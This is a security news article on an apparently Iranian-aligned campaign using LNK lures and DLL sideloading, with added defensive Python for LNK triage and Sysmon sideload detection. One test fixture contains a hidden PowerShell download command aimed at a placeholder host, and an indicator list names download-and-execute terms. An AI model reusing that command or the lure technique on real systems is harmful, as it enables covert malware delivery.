
Cybersecurity researchers have revealed details of a new campaign dubbed CRESCENTHARVEST, which likely targets supporters of ongoing protests in Iran, carrying out information theft and long-term espionage operations.
Acronis Threat Research Unit (TRU) said it has been tracking the activity since January 9. The attack delivers a payload that acts as both a remote access Trojan (RAT) and an information stealer, with the goal of executing commands, logging keystrokes, and exfiltrating sensitive data. It is currently unknown whether any of the attacks were successful.
“This campaign takes advantage of recent geopolitical developments to lure victims into opening malicious .LNK files disguised as protest-related images and videos,” researchers Subhajeet Sinha, Eliad Kimhi, and Darrell Virtusio said in a report released this week.
“These files are bundled with authentic media and Farsi-language reports that provide the latest information from ‘Iran’s rebellious cities.’ This support framework for the protests appears to be aimed at increasing credibility and attracting Farsi-speaking Iranians seeking information related to the protests.”
CRESCENTHARVEST is of unknown origin, but is believed to be the work of an Iranian-aligned threat group. The discovery marks the second campaign identified as targeting specific individuals in the aftermath of nationwide Iranian protests that began in late 2025.
Last month, French cybersecurity firm HarfangLab detailed a threat cluster called RedKitten that targeted non-governmental organizations and individuals involved in documenting recent human rights violations in Iran with the purpose of infecting them with a custom backdoor known as SloppyMIO.
According to Acronis, the exact initial access vector used to distribute the malware is unknown. However, threat actors are suspected to rely on spear phishing or “protracted social engineering efforts” in which operators take time to build relationships with victims before sending malicious payloads.
It’s worth noting that Iranian hacker groups like Charming Kitten and Tortoiseshell have a storied history of engaging in sophisticated social engineering attacks, using fake personas to approach potential targets and foster relationships, sometimes lasting years, before weaponizing trust and infecting them with malware.
“The use of Farsi-language content for social engineering and the distributed files depicting the protests in heroic terms suggest an intention to attract Iranian-Persian-speaking individuals to support the ongoing protests,” the Switzerland-based security firm said.
The starting point of the attack chain is a malicious RAR archive that purports to contain material about the Iranian protests: a set of images and videos plus two Windows shortcut (LNK) files that use a double-extension trick (*.jpg.lnk or *.mp4.lnk) to pass as image or video files.
When one of the shortcuts is launched, the PowerShell code embedded in it downloads a second-stage ZIP archive while at the same time opening a benign image or video, so the victim believes they have merely opened a media file.
The ZIP archive contains a legitimate Google-signed executable ('software_reporter_tool.exe'), shipped as part of Chrome's cleanup utility, alongside two malicious DLLs that the executable sideloads to carry out the threat actor's goals.
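The lure described above (a shortcut named like a video whose real job is to run PowerShell) can be triaged without opening the file, because the launch string lives in the Shell Link's StringData section. The following is an added example written for this page, not Acronis's tooling or anything recovered from the campaign: it builds a constructed LNK fixture in memory, parses the header and StringData fields, and flags the double extension, the hidden PowerShell launch and the minimised window hint. The sample command line, the hostname example.invalid and the indicator list are assumptions for illustration only.

```python
import struct

# Shell Link header constants (MS-SHLLINK): fixed 76-byte header, CLSID, LinkFlags bits.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_TARGET_IDLIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value commonly used to keep the console window out of sight

MEDIA_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".mp4", ".mov", ".avi"}
# Assumed indicator list: substrings in the target/arguments that rarely belong in a media shortcut.
SUSPICIOUS = ("powershell", "pwsh", "cmd.exe", "mshta", "rundll32", "wscript",
              "-enc", "hidden", "bypass", "iwr", "invoke-webrequest", "downloadstring", "iex")


def build_lnk(relative_path, arguments, show_cmd=1, unicode=True):
    """Build a minimal Shell Link (constructed test fixture, not a real sample)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | (IS_UNICODE if unicode else 0)
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags)
    header += struct.pack("<I", 0x20)            # FileAttributes: FILE_ATTRIBUTE_ARCHIVE
    header += b"\x00" * 24                       # CreationTime, AccessTime, WriteTime
    header += struct.pack("<IIIH", 0, 0, show_cmd, 0)  # FileSize, IconIndex, ShowCommand, HotKey
    header += b"\x00" * 10                       # Reserved1/2/3
    assert len(header) == 76

    def string_data(s):  # CountCharacters (u16) followed by the characters, no terminator
        raw = s.encode("utf-16-le") if unicode else s.encode("cp1252")
        return struct.pack("<H", len(s)) + raw

    return header + string_data(relative_path) + string_data(arguments)


def parse_lnk(data):
    """Return the StringData fields and ShowCommand of a Shell Link; skips IDList/LinkInfo."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    pos = 76
    if flags & HAS_TARGET_IDLIST:               # IDListSize (u16) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                   # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {"show_command": show_cmd}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            nbytes = count * 2 if unicode else count
            raw = data[pos:pos + nbytes]
            fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
            pos += nbytes
    return fields


def triage_lnk(filename, data):
    """Return a list of human-readable reasons the shortcut looks like a masquerading lure."""
    reasons = []
    parts = filename.lower().rsplit(".", 2)     # "clip.mp4.lnk" -> ["clip", "mp4", "lnk"]
    if len(parts) == 3 and parts[2] == "lnk" and "." + parts[1] in MEDIA_EXTS:
        reasons.append(f"double extension masquerading as media: .{parts[1]}.lnk")
    info = parse_lnk(data)
    launch = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    for needle in SUSPICIOUS:
        if needle in launch:
            reasons.append(f"launch string contains '{needle}'")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE (window minimised)")
    return reasons


# Constructed fixtures mimicking the lure pattern (example.invalid is a placeholder host).
SAMPLE_NAME = "tehran_protest.mp4.lnk"
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -ep bypass -c \"iwr http://example.invalid/a.zip -o $env:TEMP\\a.zip; start .\\protest.mp4\"",
    show_cmd=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(r"..\Pictures\holiday.jpg", "")

if __name__ == "__main__":
    for name, blob in ((SAMPLE_NAME, SAMPLE_LNK), ("holiday.lnk", BENIGN_LNK)):
        print(name, "->", triage_lnk(name, blob) or "clean")
```

On a real archive, run triage_lnk over every member before anything is extracted to a user profile; the parser skips the optional LinkTargetIDList and LinkInfo blocks by their size fields, so it also works on shortcuts that carry a full target ID list rather than a relative path.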
urtcbased140d_d.dll is a C++ implant that extracts and decrypts Chrome's app-bound encryption keys through a COM interface, functionality that overlaps with the open source ChromElevator project. version.dll, the CRESCENTHARVEST implant proper, is a remote access tool that lists installed antivirus products and security tools, enumerates local user accounts on the device, loads further DLLs, and collects system metadata, browser credentials, Telegram desktop account data, and keystrokes.
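The sideloading step above is what leaves the clearest host-side trace: a signed executable loading a DLL that carries a Windows system DLL's name (version.dll) from the executable's own directory rather than from %SystemRoot%. The following detection logic is an added example for this page, not Acronis's or any vendor's rule, and it runs over constructed Sysmon Event ID 7 (ImageLoad) records embedded inline; the field names Image, ImageLoaded and Signed are Sysmon's, while the paths, the list of commonly sideloaded DLL names and the severity scheme are assumptions for illustration.

```python
import json
import ntpath

# Assumed list of DLL names the loader resolves by name and which are often dropped beside a
# signed host binary for sideloading; version.dll is the one named on this page.
COMMON_SIDELOAD_NAMES = {"version.dll", "wininet.dll", "cryptbase.dll", "dbghelp.dll",
                         "userenv.dll", "profapi.dll", "winhttp.dll", "dwmapi.dll"}
SYSTEM_ROOT = r"C:\Windows"   # assumption: default %SystemRoot%


def _under_system_root(path):
    return ntpath.normcase(path).startswith(ntpath.normcase(SYSTEM_ROOT) + "\\")


def parse_events(jsonl):
    """Parse newline-delimited JSON records (one Sysmon event per line)."""
    return [json.loads(line) for line in jsonl.strip().splitlines() if line.strip()]


def detect_sideload(events):
    """Flag ImageLoad events that match the signed-EXE-plus-local-DLL sideloading pattern."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 7:
            continue
        image, loaded = ev["Image"], ev["ImageLoaded"]
        dll_name = ntpath.basename(loaded).lower()
        same_dir = ntpath.normcase(ntpath.dirname(image)) == ntpath.normcase(ntpath.dirname(loaded))
        unsigned = str(ev.get("Signed", "false")).lower() != "true"
        reasons = []
        # Rule 1: a well-known system DLL name resolved from outside %SystemRoot%.
        if dll_name in COMMON_SIDELOAD_NAMES and not _under_system_root(loaded):
            reasons.append(f"{dll_name} loaded from non-system path")
        # Rule 2: an unsigned DLL sitting next to the executable (catches renamed payload DLLs too).
        if same_dir and unsigned and not _under_system_root(loaded):
            reasons.append("unsigned DLL in the executable's own directory")
        if reasons:
            severity = "high" if dll_name in COMMON_SIDELOAD_NAMES else "medium"
            findings.append({"severity": severity, "image": image, "dll": loaded, "reasons": reasons})
    return findings


# Constructed Sysmon-style ImageLoad records (not real telemetry). Paths are JSON-escaped.
SAMPLE_EVENTS = r'''
{"EventID":7,"Image":"C:\\Users\\u\\Downloads\\protest\\software_reporter_tool.exe","ImageLoaded":"C:\\Users\\u\\Downloads\\protest\\version.dll","Signed":"false","SignatureStatus":"Unavailable"}
{"EventID":7,"Image":"C:\\Users\\u\\Downloads\\protest\\software_reporter_tool.exe","ImageLoaded":"C:\\Windows\\System32\\kernel32.dll","Signed":"true","SignatureStatus":"Valid"}
{"EventID":7,"Image":"C:\\Users\\u\\Downloads\\protest\\software_reporter_tool.exe","ImageLoaded":"C:\\Users\\u\\Downloads\\protest\\urtcbased140d_d.dll","Signed":"false","SignatureStatus":"Unavailable"}
{"EventID":7,"Image":"C:\\Windows\\System32\\notepad.exe","ImageLoaded":"C:\\Windows\\System32\\version.dll","Signed":"true","SignatureStatus":"Valid"}
{"EventID":7,"Image":"C:\\Program Files\\Vendor\\app.exe","ImageLoaded":"C:\\Program Files\\Vendor\\helper.dll","Signed":"true","SignatureStatus":"Valid"}
{"EventID":1,"Image":"C:\\Users\\u\\Downloads\\protest\\software_reporter_tool.exe","CommandLine":"software_reporter_tool.exe"}
'''

if __name__ == "__main__":
    for f in detect_sideload(parse_events(SAMPLE_EVENTS)):
        print(f["severity"], f["image"], "->", f["dll"], f["reasons"])
```

Sysmon does not record ImageLoad events unless the configuration enables them, so this only works on hosts whose Sysmon config includes an ImageLoad rule; the expected output for the fixture is one high-severity hit for version.dll (both rules) and one medium-severity hit for the second DLL (rule 2 only), while the System32 and Program Files loads stay quiet.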
CRESCENTHARVEST uses the Windows WinHTTP API to communicate with its command-and-control (C2) server (rendered in the source as “Service Log Information”[.]com) so that its traffic blends in with normal HTTP activity. Some of the supported commands are listed below.
- Anti, His: perform anti-analysis checks
- Dir: list directories
- Cwd: get the current working directory
- Cd: change directory
- GetUser: get user information
- ps: run PowerShell commands (does not work)
- KeyLog: activate the keylogger
- Tel_s: steal Telegram session data
- Cook: steal browser cookies
- Info: steal system information
- F_log: steal browser credentials
- Upload: upload files
- Shell: run shell commands
“The CRESCENTHARVEST campaign represents the latest chapter in a decade-long pattern of suspected state-sponsored cyber espionage targeting journalists, activists, researchers, and diaspora communities around the world,” Acronis said. “Much of what we observed with CRESCENTHARVEST reflects established tradecraft, including LNK-based initial access, sideloading of DLLs with signed binaries, credential harvesting, and social engineering tailored to current events.”
